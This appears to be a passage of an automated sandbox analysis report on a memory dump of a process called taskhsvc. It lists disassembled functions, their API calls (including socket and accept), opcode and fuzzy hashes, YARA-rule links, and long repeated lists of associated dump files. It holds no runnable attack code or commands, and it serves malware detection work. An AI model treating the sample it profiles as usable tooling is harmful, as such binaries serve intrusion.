Opcode ID: e4e65c4e687e53b7a6b496d5b148fcf5ed97ea8ea42b022c145ec5ee6db87c53
Instruction ID: 4e2eb1ad095bc45d7afe95e3606150129c176dfc0d075e26fd6ff60bccdaea6d
Opcode Fuzzy Hash: e4e65c4e687e53b7a6b496d5b148fcf5ed97ea8ea42b022c145ec5ee6db87c53
Instruction Fuzzy Hash: 6F31E2B190974ADBCB04AF65C54966EBBF0AF40358F00DC1CE4D8AB345DB7895498F52

Uniqueness

Uniqueness Score: -1.00%

Function 00DACA37 Relevance: 3.1, APIs: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00E46C8C: abort.MSVCRT ref: 00E46CDC
Part of subcall function 00E46C8C: __stack_chk_fail.LIBSSP-0 ref: 00E46D00

Part of subcall function 00E46D83: abort.MSVCRT ref: 00E46DD3
Part of subcall function 00E46D83: __stack_chk_fail.LIBSSP-0 ref: 00E46DF7

__stack_chk_fail.LIBSSP-0 ref: 00DACB92

Part of subcall function 00ECED64: abort.MSVCRT ref: 00ECEDC3
Part of subcall function 00ECED64: abort.MSVCRT ref: 00ECEE06
Part of subcall function 00ECED64: free.MSVCRT ref: 00ECEEC9

free.MSVCRT ref: 00DACB5D

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort$free
String ID:
API String ID: 1721009914-0
Opcode ID: 7d005fa0952b7a48be4441e61a900e0b348e3243a48513a40e0fdadc5860693b
Instruction ID: 8abcc44380b61ad032cce7caccf75612cde1a85c1808ae526cdb146185f753ed
Opcode Fuzzy Hash: 7d005fa0952b7a48be4441e61a900e0b348e3243a48513a40e0fdadc5860693b
Instruction Fuzzy Hash: 8431A5B4A04306CFCB04EFA9C585AAEBBF0BF48314F159819E484A7351D775DA45CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EE7141 Relevance: 3.1, APIs: 2, Instructions: 67networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE721B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00EE6FE0), ref: 00EE724B

accept.WS2_32 ref: 00EE71B3
__stack_chk_fail.LIBSSP-0 ref: 00EE7214

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$accept
String ID:
API String ID: 3757720590-0
Opcode ID: 5d469c9a07060ee9facdf7706735deb473c58ed4c295c2d124ae046aa1c915e5
Instruction ID: dfe3a0976dfdcc56e9f695e3885b3f5e80d0991f9449acf6ddb9710178112758
Opcode Fuzzy Hash: 5d469c9a07060ee9facdf7706735deb473c58ed4c295c2d124ae046aa1c915e5
Instruction Fuzzy Hash: 0721C6B4E0424A8BCB10EFBDD9855ADBBF0BB09324F105A29E8A5F7394E7349901CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00EE6FAD Relevance: 3.1, APIs: 2, Instructions: 67networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE721B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00EE6FE0), ref: 00EE724B

socket.WS2_32 ref: 00EE701F
__stack_chk_fail.LIBSSP-0 ref: 00EE7080

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$socket
String ID:
API String ID: 1765785985-0
Opcode ID: e5a9d42563cb388c8961b19f6f036de0e56b60b935558cea905c9b4e8686dabd
Instruction ID: 2fae80e52969f938f79ed3784e677144e816e552137c61924fec4683ae11e84c
Opcode Fuzzy Hash: e5a9d42563cb388c8961b19f6f036de0e56b60b935558cea905c9b4e8686dabd
Instruction Fuzzy Hash: D521C2B4E042498FCB10EFBDD8859ADBBF0BB08324F105A29E8A4F7394D735A8419F51

Uniqueness

Uniqueness Score: -1.00%

Function 00E55C3C Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00E55D01

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E55E47), ref: 00E55C92

Part of subcall function 00EF2B81: __stack_chk_fail.LIBSSP-0 ref: 00EF2BBD

Part of subcall function 00E558E6: abort.MSVCRT ref: 00E55942
Part of subcall function 00E558E6: __stack_chk_fail.LIBSSP-0 ref: 00E55A16

Memory Dump Source

Source File: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortstrrchr
String ID:
API String ID: 2422377151-0
Opcode ID: 618553c6be41a4289df572769cba9c5a967862f2e73eda9f1056d67293657eaa
Instruction ID: 106c448dca02bbc2cf44425a82fdb18d0a171d7d8688c6811749cf61284e6517
Opcode Fuzzy Hash: 618553c6be41a4289df572769cba9c5a967862f2e73eda9f1056d67293657eaa
Instruction Fuzzy Hash: 2221F3B1D0470A9FCB00EFA8C4856AEBBF0BF09354F009D19E8A5AB341E7389509CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00EE928D Relevance: 3.0, APIs: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 00EE92E4
__stack_chk_fail.LIBSSP-0 ref: 00EE933D

Part of subcall function 00EF13EE: abort.MSVCRT ref: 00EF143E
Part of subcall function 00EF13EE: _strdup.MSVCRT ref: 00EF1449
Part of subcall function 00EF13EE: exit.MSVCRT ref: 00EF148A
Part of subcall function 00EF13EE: __stack_chk_fail.LIBSSP-0 ref: 00EF149D

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
